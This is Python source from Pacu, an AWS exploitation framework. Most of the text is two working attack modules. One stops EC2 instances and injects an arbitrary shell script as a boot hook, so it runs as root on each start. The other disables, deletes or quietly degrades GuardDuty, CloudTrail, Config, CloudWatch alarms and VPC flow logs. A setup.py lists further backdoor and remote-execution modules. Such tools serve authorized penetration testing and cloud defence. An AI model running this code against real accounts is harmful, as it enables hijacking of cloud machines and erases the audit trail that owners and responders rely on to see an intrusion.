    if len(configs) > 0:
        print("QueryLoggingConfigs:")
        for con in configs:
            print(f"ZoneID: {con['HostedZoneId']} :: CloudWatchLogsLogGroupArn: {con['CloudWatchLogsLogGroupArn']}")
    else:
        print("No QueryLoggingConfigs found")

    return configs


def zones_plus_config(zones, configs):
    for con in configs:
        if con['HostedZoneId'] in zones.keys():
            zones[con['HostedZoneId']].update({'CloudWatchLogsLogGroupArn': con['CloudWatchLogsLogGroupArn']})
            zones[con['HostedZoneId']].update({'QueryLoggingConfigId': con['Id']})

    return zones


def main(args, pacu_main):
    session = pacu_main.get_active_session()
    print = pacu_main.print
    args = parser.parse_args(args)

    try:
        client = pacu_main.get_boto3_client('route53')
    except ClientError as error:
        print(f'Failed to initialize boto client for route53: {error}')

    data = {}

    try:
        zones = get_hosted_zones(client=client)
    except ClientError as error:
        print(f'Failed to list R53 Hosted Zones: {error}')
        return

    try:
        confs = get_query_logging_config(client=client)
    except ClientError as error:
        print(f'Failed to list R53 Hosted Zone Query Logging Configurations: {error}')
        return

    data = zones_plus_config(zones=zones, configs=confs)

    session.update(pacu_main.database, Route53=data)

    return data


def summary(data, pacu_main):
    if len(data) > 0:
        return f"Found {len(data)} hosted zones:\n{json.dumps(data, indent=2)}"
    else:
        return 'No hosted zones found.'



#!/usr/bin/env python3
import argparse
import base64
from botocore.exceptions import ClientError
import time
import random


module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'ec2__startup_shell_script',

    # Name and any other notes about the author
    'author': 'Spencer Gietzen of Rhino Security Labs based on the idea from https://github.com/dagrz/aws_pwn/blob/master/elevation/bouncy_bouncy_cloudy_cloud.py',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'EXPLOIT',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Stops and restarts EC2 instances to execute code.',

    # Description about what the module does and how it works
    'description': 'This module will attempt to stop the chosen EC2 instances, store/display the User Data that is already set for each EC2 instance, update it with a shell script (.sh) of your choosing, then start the instances again. The shell script will be executed as root/SYSTEM everytime the specific instances are booted up.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['EC2'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': ['ec2__enum'],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': ['--script', '--instance-ids'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--script', required=True, help='File path of the shell script to add to the EC2 instances')
parser.add_argument('--instance-ids', required=False, default=None, help='One or more (comma separated) EC2 instance IDs and their regions in the format instanceid@region. Defaults to all instances.')


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    fetch_data = pacu_main.fetch_data
    get_regions = pacu_main.get_regions
    ######

    regions = get_regions('ec2')

    client = pacu_main.get_boto3_client('ec2', random.choice(regions))

    instances = []
    if args.instance_ids is not None:  # need to update this to include the regions of these IDs
        for instance in args.instance_ids.split(','):
            if "@" not in instance:
                print("Usage: <instance-id>@<region>   ex: i-abcdef12345@us-west-2")
                return({"error": "invalid usage"})
            instances.append({
                'InstanceId': instance.split('@')[0],
                'Region': instance.split('@')[1]
            })
    else:
        print('Targeting all EC2 instances...')
        if fetch_data(['EC2', 'Instances'], module_info['prerequisite_modules'][0], '--instances') is False:
            print('Sub-module run failed')
            return
        for instance in session.EC2['Instances']:
            instances.append({
                'InstanceId': instance['InstanceId'],
                'Region': instance['Region']
            })
    instance_count = 0
    for region in regions:
        client = pacu_main.get_boto3_client('ec2', region)
        for instance in instances:
            if instance['Region'] == region:
                result = stop_instance(client, instance['InstanceId'], print)
                if result:
                    update_userdata(client, instance['InstanceId'], prepare_user_data(client, instance['InstanceId'], args.script), print)
                    start_instance(client, instance['InstanceId'], print)
                    instance_count += 1
                else:
                    print('  {}@{} FAILED'.format(instance['InstanceId'], instance['Region']))
    return {'Instances': instance_count}


def summary(data, pacu_main):
    if data['Instances']:
        out = '  {} Instance(s) Modified'.format(data['Instances'])
    else:
        out = '  No Instances Modified'
    return out


def stop_instance(client, instance_id, print):
    print('Stopping {}'.format(instance_id))
    try:
        client.stop_instances(InstanceIds=[instance_id])
        return True
    except ClientError as error:
        code = error.response['Error']['Code']
        print('FAILURE: ')
        if code == 'UnauthorizedOperation':
            print('  Access denied to StopInstances.')
        else:
            print('  ' + code)
    return False


def start_instance(client, instance_id, print):
    print('Starting {}'.format(instance_id))
    try:
        client.start_instances(InstanceIds=[instance_id])
        return True
    except ClientError as error:
        code = error.response['Error']['Code']
        print('FAILURE: ')
        if code == 'UnauthorizedOperation':
            print('  Access denied to StartInstances.')
        else:
            print('  ' + code)
    return False


def prepare_user_data(client, instance_id, script):
    # TODO: Replace this with a fetch_data of download_ec2_userdata
    # This will error if the UserData is gzipped
    try:
        response = client.describe_instance_attribute(
            Attribute='userData',
            InstanceId=instance_id
        )
        user_data = ''
        if response['UserData']:
            user_data = base64.b64decode(response['UserData']['Value']).decode("utf-8")
            # Save the current data in case there is something sensitive
            # with open('output/scrapedUserData.txt', 'a+') as scraped_user_data_file:
            #     scraped_user_data_file.write('User data for instance id {}: {}\n'.format(instance_id, user_data))

        with open(script, 'r') as shell_script:
            # Append our script to their old user data to not screw up the instance
            user_data = '#cloud-boothook\n{}\n\n{}'.format(shell_script.read(), user_data)  # the #cloud-boothook directive is what runs the code every single time the EC2 starts. Regular old user data only runs on the first instance launch

        return user_data
    except ClientError as error:
        code = error.response['Error']['Code']
        print('FAILURE: ')
        if code == 'UnauthorizedOperation':
            print('  Access denied to DescribeInstanceAttribute.')
        else:
            print('  ' + code)
        return False


def update_userdata(client, instance_id, user_data, print):
    print('Setting User Data for {}'.format(instance_id))

    result = False
    code = 'IncorrectInstanceState'

    while(code == 'IncorrectInstanceState' and not result):
        try:
            client.modify_instance_attribute(
                InstanceId=instance_id,
                UserData={
                    'Value': user_data
                }
            )
            result = True
        except ClientError as error:
            code = error.response['Error']['Code']
            if code == 'UnauthorizedOperation':
                print('  Access denied to ModifyInstanceAttribute.')
                return False
            elif code != 'IncorrectInstanceState':
                print(error.response['Error']['Message'])
                return False
            time.sleep(5)

    return result



#!/usr/bin/env python3
import argparse
from copy import deepcopy


module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'detection__disruption',

    # Name and any other notes about the author
    'author': 'Spencer Gietzen of Rhino Security Labs',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'EVADE',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Disables, deletes, or minimizes various logging/monitoring services.',

    # Full description about what the module does and how it works
    'description': 'This module will take enumerated CloudTrail trails, GuardDuty detectors, various Config settings, CloudWatch alarms, and VPC flow logs and present you with the option of disabling or deleting each one. For CloudTrail, you also have the option of minimizing it. Minimizing a trail leaves it enabled, but changes all the settings to their very basic level. These changes include: removing the associated SNS topic, disabling global service event logging, disabling multi-regional log collection, disabling log file validation, removing the associated CloudWatch log group/role, and disabling log file encryption. The idea of this is to minimize the amount of logging in the environment without calling dangerous APIs like disable or delete.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['GuardDuty', 'CloudTrail', 'EC2', 'Config', 'monitoring'],  # CloudWatch needs to be "monitoring" and VPC needs to be "EC2" here for "ls" to work

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': ['detection__enum_services'],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': ['--trails', '--detectors', '--config-rules', '--config-recorders', '--config-aggregators', '--alarms', '--flow-logs'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--trails', required=False, default=None, help='Comma-separated list of CloudTrail trail names and regions to target instead of enumerating them. They should be formatted like trail_name@region.')
parser.add_argument('--detectors', required=False, default=None, help='Comma-separated list of GuardDuty detector IDs and regions to target, instead of enumerating them. They should be formatted like detector_id@region.')
parser.add_argument('--config-rules', required=False, default=None, help='Comma-separated list of Config rule names and regions to target, instead of enumerating them. They should be formatted like rule_name@region.')
parser.add_argument('--config-recorders', required=False, default=None, help='Comma-separated list of Config configuration recorder names and regions to target, instead of enumerating them. They should be formatted like recorder_name@region.')
parser.add_argument('--config-aggregators', required=False, default=None, help='Comma-separated list of Config configuration aggregator names and regions to target, instead of enumerating them. They should be formatted like aggregator_name@region.')
parser.add_argument('--alarms', required=False, default=None, help='Comma-separated list of CloudWatch alarm names and regions to target, instead of enumerating them. They should be formatted like alarm_name@region.')
parser.add_argument('--flow-logs', required=False, default=None, help='Comma-separated list of VPC Flow Log IDs and regions to target, instead of enumerating them. They should be formatted like log_id@region.')


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    input = pacu_main.input
    fetch_data = pacu_main.fetch_data
    get_regions = pacu_main.get_regions
    ######

    gd_regions = get_regions('guardduty')
    ct_regions = get_regions('cloudtrail')
    config_regions = get_regions('config')
    cw_regions = get_regions('monitoring')
    vpc_regions = get_regions('ec2')

    trails = []
    detectors = []
    rules = []
    recorders = []
    aggregators = []
    alarms = []
    flow_logs = []

    summary_data = {}

    # If any arguments are passed in, that that means to not check the database
    # to see if we need to enumerate stuff
    if any([
        args.alarms,
        args.trails,
        args.flow_logs,
        args.detectors,
        args.config_rules,
        args.config_recorders,
        args.config_aggregators
    ]):
        if args.trails is not None:
            ct_regions = set()
            for trail in args.trails.split(','):
                name, region = trail.split('@')
                trails.append({
                    'Name': name,
                    'Region': region
                })
                ct_regions.add(region)

        if args.detectors is not None:
            gd_regions = set()
            for detector in args.detectors.split(','):
                id, region = detector.split('@')
                detectors.append({
                    'Id': id,
                    'Region': region
                })
                gd_regions.add(region)

        tmp_config_regions = set()
        if args.config_rules is not None:
            for rule in args.config_rules.split(','):
                name, region = rule.split('@')
                rules.append({
                    'ConfigRuleName': name,
                    'Region': region
                })
                tmp_config_regions.add(region)

        if args.config_recorders is not None:
            for recorder in args.config_records.split(','):
                name, region = recorder.split('@')
                recorders.append({
                    'name': name,
                    'Region': region
                })
                tmp_config_regions.add(region)

        if args.config_aggregators is not None:
            for aggregator in args.config_aggregators.split(','):
                name, region = aggregator.split('@')
                aggregators.append({
                    'ConfigurationAggregatorName': name,
                    'Region': region
                })
                tmp_config_regions.add(region)

        if len(tmp_config_regions) > 0:
            config_regions = tmp_config_regions

        if args.alarms is not None:
            cw_regions = set()
            for alarm in args.alarms.split(','):
                name, region = alarm.split('@')
                alarms.append({
                    'AlarmName': name,
                    'Region': region
                })
                cw_regions.add(region)

        if args.flow_logs is not None:
            vpc_regions = set()
            for log in args.flow_logs.split(','):
                id, region = log.split('@')
                flow_logs.append({
                    'FlowLogId': id,
                    'Region': region
                })
                vpc_regions.add(region)
    else:
        # No arguments passed in, so disrupt everything. We need to
        # figure out what data from enum_monitoring is missing, so
        # that multiple calls are not required. This is done by
        # building an argument string after checking the DB.
        arguments = []
        cloudtrail_data = deepcopy(session.CloudTrail)
        guardduty_data = deepcopy(session.GuardDuty)
        config_data = deepcopy(session.Config)
        vpc_data = deepcopy(session.VPC)
        cloudwatch_data = deepcopy(session.CloudWatch)

        if 'Trails' not in cloudtrail_data:
            arguments.append('--cloud-trail')
        else:
            trails = cloudtrail_data['Trails']

        if 'Detectors' not in guardduty_data:
            arguments.append('--guard-duty')
        else:
            detectors = guardduty_data['Detectors']

        # If Rules isn't in there, then none of the other stuff has been enumerated either
        if 'Rules' not in config_data:
            arguments.append('--config')
        else:
            rules = config_data['Rules']
            recorders = config_data['Recorders']
            aggregators = config_data['Aggregators']

        if 'Alarms' not in cloudwatch_data:
            arguments.append('--cloud-watch')
        else:
            alarms = cloudwatch_data['Alarms']

        if 'FlowLogs' not in vpc_data:
            arguments.append('--vpc')
        else:
            flow_logs = vpc_data['FlowLogs']

        # If there is missing data, run enum_monitoring
        if len(arguments) > 0:
            if fetch_data(['Logging/Monitoring Data'], module_info['prerequisite_modules'][0], ' '.join(arguments)) is False:
                print('Pre-req module not run successfully. Only targeting services that currently have valid data...\n')
            else:
                trails = deepcopy(session.CloudTrail['Trails'])
                detectors = deepcopy(session.GuardDuty['Detectors'])
                rules = deepcopy(session.Config['Rules'])
                recorders = deepcopy(session.Config['Recorders'])
                aggregators = deepcopy(session.Config['Aggregators'])
                alarms = deepcopy(session.CloudWatch['Alarms'])
                flow_logs = deepcopy(session.VPC['FlowLogs'])

    if len(detectors) > 0:
        print('Starting GuardDuty...\n')
        summary_data['guardduty'] = {
            'disabled': 0,
            'deleted': 0,
        }
        for region in gd_regions:
            print('  Starting region {}...\n'.format(region))

            client = pacu_main.get_boto3_client('guardduty', region)

            for detector in detectors:
                if detector['Region'] == region:
                    action = input('    GuardDuty detector ID: {}\n        Do you want to disable (dis), delete (del), or skip (s) it? (dis/del/s) '.format(detector['Id'])).strip().lower()

                    if action == 'dis':
                        try:
                            client.update_detector(
                                DetectorId=detector['Id'],
                                Enable=False
                            )
                            print('        Successfully disabled detector {}!\n'.format(detector['Id']))
                            summary_data['guardduty']['disabled'] += 1
                        except Exception as error:
                            print('        Could not disable detector {}:\n      {}\n'.format(detector['Id'], error))

                    elif action == 'del':
                        try:
                            client.delete_detector(
                                DetectorId=detector['Id']
                            )
                            print('        Successfully deleted detector {}!\n'.format(detector['Id']))
                            summary_data['guardduty']['deleted'] += 1
                        except Exception as error:
                            print('        Could not delete detector {}:\n      {}\n'.format(detector['Id'], error))

                    else:
                        print('    Skipping detector {}...\n'.format(detector['Id']))

        print('GuardDuty finished.\n')

    else:
        print('No detectors found. Skipping GuardDuty...\n')

    if len(trails) > 0:
        print('Starting CloudTrail...\n')
        summary_data['cloudtrail'] = {
            'disabled': 0,
            'deleted': 0,
            'minimized': 0,
        }
        for region in ct_regions:
            print('  Starting region {}...\n'.format(region))

            client = pacu_main.get_boto3_client('cloudtrail', region)

            for trail in trails:
                if trail['Region'] == region:
                    action = input('    CloudTrail trail name: {}\n        Do you want to disable (dis), delete (del), minimize (m), or skip (s) it? (dis/del/m/s) '.format(trail['Name'])).strip().lower()

                    if action == 'dis':
                        try:
                            client.stop_logging(
                                Name=trail['Name']
                            )
                            print('        Successfully disabled trail {}!\n'.format(trail['Name']))
                            summary_data['cloudtrail']['disabled'] += 1
                        except Exception as error:
                            print('        Could not disable trail {}:\n      {}\n'.format(trail['Name'], error))

                    elif action == 'del':
                        try:
                            client.delete_trail(
                                Name=trail['Name']
                            )
                            print('        Successfully deleted trail {}!\n'.format(trail['Name']))
                            summary_data['cloudtrail']['deleted'] += 1
                        except Exception as error:
                            print('        Could not delete trail {}:\n      {}\n'.format(trail['Name'], error))

                    elif action == 'm':
                        try:
                            client.update_trail(
                                Name=trail['Name'],
                                SnsTopicName='',
                                IncludeGlobalServiceEvents=False,
                                IsMultiRegionTrail=False,
                                EnableLogFileValidation=False,
                                CloudWatchLogsLogGroupArn='',
                                CloudWatchLogsRoleArn='',
                                KmsKeyId=''
                            )
                            print('        Successfully minimized trail {}!\n'.format(trail['Name']))
                            summary_data['cloudtrail']['minimized'] += 1
                        except Exception as error:
                            print('        Could not minimize trail {}:\n      {}\n'.format(trail['Name'], error))

                    else:
                        print('        Skipping trail {}...\n'.format(trail['Name']))

        print('CloudTrail finished.\n')
    else:
        print('No trails found. Skipping CloudTrail...\n')

    if len(rules) > 0:
        print('Starting Config rules...\n')
        summary_data['awsconfig'] = {
            'rules': {
                'deleted': 0,
            },
            'recorders': {
                'deleted': 0,
                'stopped': 0,
            },
            'aggregators': {
                'deleted': 0,
            }
        }

        for region in config_regions:
            print('  Starting region {}...\n'.format(region))

            client = pacu_main.get_boto3_client('config', region)

            for rule in rules:
                if rule['Region'] == region:
                    action = input('    Rule Name: {}\n      Do you want to delete this rule? (y/n) '.format(rule['ConfigRuleName'])).strip().lower()
                    if action == 'y':
                        try:
                            client.delete_config_rule(
                                ConfigRuleName=rule['ConfigRuleName']
                            )
                            print('        Successfully deleted rule {}!\n'.format(rule['ConfigRuleName']))
                            summary_data['awsconfig']['rules']['deleted'] += 1
                        except Exception as error:
                            print('        Could not delete rule {}:\n          {}\n'.format(rule['ConfigRuleName'], error))
                    else:
                        print('        Skipping rule {}...\n'.format(rule['ConfigRuleName']))
        print('Config rules finished.\n')
    else:
        print('No rules found. Skipping Config rules...\n')

    if len(recorders) > 0:
        print('Starting Config recorders...\n')
        for region in config_regions:
            print('  Starting region {}...\n'.format(region))

            client = pacu_main.get_boto3_client('config', region)

            for recorder in recorders:
                if recorder['Region'] == region:
                    action = input('    Recorder Name: {}\n      Do you want to stop (stop), delete (del), or skip (skip) this recorder? (stop/del/skip) '.format(recorder['name'])).strip().lower()
                    if action == 'del':
                        try:
                            client.delete_configuration_recorder(
                                ConfigurationRecorderName=recorder['name']
                            )
                            print('        Successfully deleted recorder {}!\n'.format(recorder['name']))
                            summary_data['awsconfig']['recorders']['deleted'] += 1
                        except Exception as error:
                            print('        Could not delete recorder {}:\n          {}\n'.format(recorder['name'], error))
                    elif action == 'stop':
                        try:
                            client.stop_configuration_recorder(
                                ConfigurationRecorderName=recorder['name']
                            )
                            print('        Successfully stopped recorder {}!\n'.format(recorder['name']))
                            summary_data['awsconfig']['recorders']['stopped'] += 1
                        except Exception as error:
                            print('        Could not stop recorder {}:\n          {}\n'.format(recorder['name'], error))
                    else:
                        print('        Skipping recorder {}...\n'.format(recorder['name']))
        print('Config recorders finished.\n')
    else:
        print('No recorders found. Skipping Config recorders...\n')

    if len(aggregators) > 0:
        print('Starting Config aggregators...\n')
        for region in config_regions:
            print('  Starting region {}...\n'.format(region))

            client = pacu_main.get_boto3_client('config', region)

            for aggregator in aggregators:
                if aggregator['Region'] == region:
                    action = input('    Aggregator Name: {}\n      Do you want to delete this aggregator? (y/n) '.format(aggregator['ConfigurationAggregatorName'])).strip().lower()
                    if action == 'y':
                        try:
                            client.delete_configuration_aggregator(
                                ConfigurationAggregatorName=aggregator['ConfigurationAggregatorName']
                            )
                            print('        Successfully deleted aggregator {}!\n'.format(aggregator['ConfigurationAggregatorName']))
                            summary_data['awsconfig']['aggregators']['deleted'] += 1
                        except Exception as error:
                            print('        Could not delete aggregator {}:\n          {}\n'.format(aggregator['ConfigurationAggregatorName'], error))
                    else:
                        print('        Skipping aggregator {}...\n'.format(aggregator['ConfigurationAggregatorName']))
        print('Config aggregators finished.\n')
    else:
        print('No aggregators found. Skipping Config aggregators...\n')

    if len(alarms) > 0:
        print('Starting CloudWatch alarms...\n')
        summary_data['cloudwatch'] = {
            'deleted': 0,
            'disabled': 0,
        }
        for region in cw_regions:
            print('  Starting region {}...\n'.format(region))

            client = pacu_main.get_boto3_client('cloudwatch', region)

            for alarm in alarms:
                if alarm['Region'] == region:
                    action = input('    Alarm Name: {}\n      Do you want to disable the associated actions (dis), delete (del), or skip (s) this alarm? (dis/del/s) '.format(alarm['AlarmName'])).strip().lower()
                    if action == 'del':
                        try:
                            # delete_alarms can take multiple alarm names in one request,
                            # but if there are ANY errors, no alarms are deleted, so I
                            # chose to do one at a time here
                            client.delete_alarms(
                                AlarmNames=[
                                    alarm['AlarmName']
                                ]
                            )
                            print('        Successfully deleted alarm {}!\n'.format(alarm['AlarmName']))
                            summary_data['cloudwatch']['deleted'] += 1
                        except Exception as error:
                            print('        Could not delete alarm {}:\n          {}\n'.format(alarm['AlarmName'], error))
                    elif action == 'dis':
                        try:
                            client.disable_alarm_actions(
                                AlarmNames=[
                                    alarm['AlarmName']
                                ]
                            )
                            print('        Successfully disabled actions for alarm {}!\n'.format(alarm['AlarmName']))
                            summary_data['cloudwatch']['disabled'] += 1
                        except Exception as error:
                            print('        Could not disable actions for alarm {}:\n          {}\n'.format(alarm['AlarmName'], error))
                    else:
                        print('        Skipping alarm {}...\n'.format(alarm['AlarmName']))
        print('CloudWatch alarms finished.\n')
    else:
        print('No alarms found. Skipping CloudWatch...\n')

    if len(flow_logs) > 0:
        print('Starting VPC flow logs...\n')
        summary_data['vpc'] = {
            'deleted': 0
        }
        for region in vpc_regions:
            print('  Starting region {}...\n'.format(region))

            client = pacu_main.get_boto3_client('ec2', region)

            logs_to_delete = []
            for log in flow_logs:
                if log['Region'] == region:
                    action = input('    Flow Log ID: {}\n      Do you want to delete this flow log? (y/n) '.format(log['FlowLogId'])).strip().lower()
                    if action == 'y':
                        logs_to_delete.append(log['FlowLogId'])
                        print('        Added flow log {} to list of logs to delete.'.format(log['FlowLogId']))
                    else:
                        print('        Skipping flow log {}...\n'.format(log['FlowLogId']))
            # We can batch delete these and not worry about any fails, as it will do as much as it can, unlike above
            try:
                response = client.delete_flow_logs(
                    FlowLogIds=logs_to_delete
                )
                print('        Attempt to delete all flow logs succeeded. Read the output for more information on any fails:\n          {}\n'.format(response))
                summary_data['vpc']['deleted'] += len(logs_to_delete) - len(response['Unsuccessful'])
            except Exception as error:
                print('        Attempt to delete flow logs failed:\n          {}\n'.format(error))
        print('VPC flow logs finished.\n')
    else:
        print('No flow logs found. Skipping VPC...\n')

    return summary_data


def summary(data, pacu_main):
    out = ''
    if 'guardduty' in data:
        out += '  GuardDuty:\n'
        out += '    {} detector(s) disabled.\n'.format(data['guardduty']['disabled'])
        out += '    {} detector(s) deleted.\n'.format(data['guardduty']['deleted'])
    if 'cloudtrail' in data:
        out += '  CloudTrail:\n'
        out += '    {} trail(s) disabled.\n'.format(data['cloudtrail']['disabled'])
        out += '    {} trail(s) deleted.\n'.format(data['cloudtrail']['deleted'])
        out += '    {} trail(s) minimized.\n'.format(data['cloudtrail']['minimized'])
    if 'awsconfig' in data:
        out += '  AWSConfig:\n'
        out += '    Rules:\n'
        out += '      {} rule(s) deleted.\n'.format(data['awsconfig']['rules']['deleted'])
        out += '    Recorders:\n'
        out += '      {} recorder(s) deleted.\n'.format(data['awsconfig']['recorders']['deleted'])
        out += '      {} recorder(s) stopped.\n'.format(data['awsconfig']['recorders']['stopped'])
        out += '    Aggregators:\n'
        out += '      {} aggregator(s) deleted.\n'.format(data['awsconfig']['aggregators']['deleted'])
    if 'vpc' in data:
        out += '  VPC:\n'
        out += '    {} flow log(s) deleted.\n'.format(data['vpc']['deleted'])
    return out



# -*- coding: utf-8 -*-
from setuptools import setup

packages = \
['pacu',
 'pacu.core',
 'pacu.core.secretfinder',
 'pacu.modules',
 'pacu.modules.acm__enum',
 'pacu.modules.api_gateway__create_api_keys',
 'pacu.modules.apigateway__enum',
 'pacu.modules.aws__enum_account',
 'pacu.modules.aws__enum_spend',
 'pacu.modules.cloudformation__download_data',
 'pacu.modules.cloudtrail__csv_injection',
 'pacu.modules.cloudtrail__download_event_history',
 'pacu.modules.cloudwatch__download_logs',
 'pacu.modules.codebuild__enum',
 'pacu.modules.detection__disruption',
 'pacu.modules.detection__enum_services',
 'pacu.modules.dynamodb__enum',
 'pacu.modules.ebs__download_snapshots',
 'pacu.modules.ebs__enum_volumes_snapshots',
 'pacu.modules.ebs__explore_snapshots',
 'pacu.modules.ec2__backdoor_ec2_sec_groups',
 'pacu.modules.ec2__check_termination_protection',
 'pacu.modules.ec2__download_userdata',
 'pacu.modules.ec2__enum',
 'pacu.modules.ec2__startup_shell_script',
 'pacu.modules.ecr__enum',
 'pacu.modules.ecs__backdoor_task_def',
 'pacu.modules.ecs__enum',
 'pacu.modules.ecs__enum_task_def',
 'pacu.modules.elb__enum_logging',
 'pacu.modules.enum__secrets',
 'pacu.modules.glue__enum',
 'pacu.modules.guardduty__list_accounts',
 'pacu.modules.guardduty__list_findings',
 'pacu.modules.guardduty__whitelist_ip',
 'pacu.modules.iam__backdoor_assume_role',
 'pacu.modules.iam__backdoor_users_keys',
 'pacu.modules.iam__backdoor_users_password',
 'pacu.modules.iam__bruteforce_permissions',
 'pacu.modules.iam__detect_honeytokens',
 'pacu.modules.iam__enum_permissions',
 'pacu.modules.iam__enum_roles',
 'pacu.modules.iam__enum_users',
 'pacu.modules.iam__enum_users_roles_policies_groups',
 'pacu.modules.iam__get_credential_report',
 'pacu.modules.iam__privesc_scan',
 'pacu.modules.inspector__get_reports',
 'pacu.modules.lambda__backdoor_new_roles',
 'pacu.modules.lambda__backdoor_new_sec_groups',
 'pacu.modules.lambda__backdoor_new_users',
 'pacu.modules.lambda__enum',
 'pacu.modules.lightsail__download_ssh_keys',
 'pacu.modules.lightsail__enum',
 'pacu.modules.lightsail__generate_ssh_keys',
 'pacu.modules.lightsail__generate_temp_access',
 'pacu.modules.rds__explore_snapshots',
 'pacu.modules.route53__enum',
 'pacu.modules.s3__download_bucket',
 'pacu.modules.systemsmanager__download_parameters',
 'pacu.modules.systemsmanager__rce_ec2',
 'pacu.modules.vpc__enum_lateral_movement',
 'pacu.modules.waf__enum',
 'pacu.modules_archive.iam__enum_assume_role',
 'pacu.modules_archive.s3__bucket_finder']

package_data = \
{'': ['*'],
 'pacu.modules.iam__privesc_scan': ['PassExistingRoleToNewCodeStarProject/*']}

install_requires = \
['SQLAlchemy-Utils>=0.36.8,<0.37.0',
 'SQLAlchemy>=1.3.0,<1.4.0',
 'awscli>=1.18,<2.0',
 'boto3>=1.16,<2.0',
 'botocore>=1.16,<2.0',
 'dsnap>=1.0.0,<2.0.0',
 'requests>=2.25.1,<3.0.0',
 'typing-extensions>=3.7.4.3,<4.0.0.0',
 'urllib3>=1.26.4,<2.0.0']

entry_points = \
{'console_scripts': ['pacu = pacu.__main__:main']}

setup_kwargs = {
    'name': 'pacu',
    'version': '0.1.15',
    'description': '',
    'long_description': None,
    'author': 'Ryan Gerstenkorn',
    'author_email': 'ryan.gerstenkorn@rhinosecuritylabs.com',
    'maintainer': None,
    'maintainer_email': None,
    'url': None,
    'packages': packages,
    'package_data': package_data,
    'install_requires': install_requires,
    'entry_points': entry_points,
    'python_requires': '>=3.6,<4.0',
}


setup(**setup_kwargs)
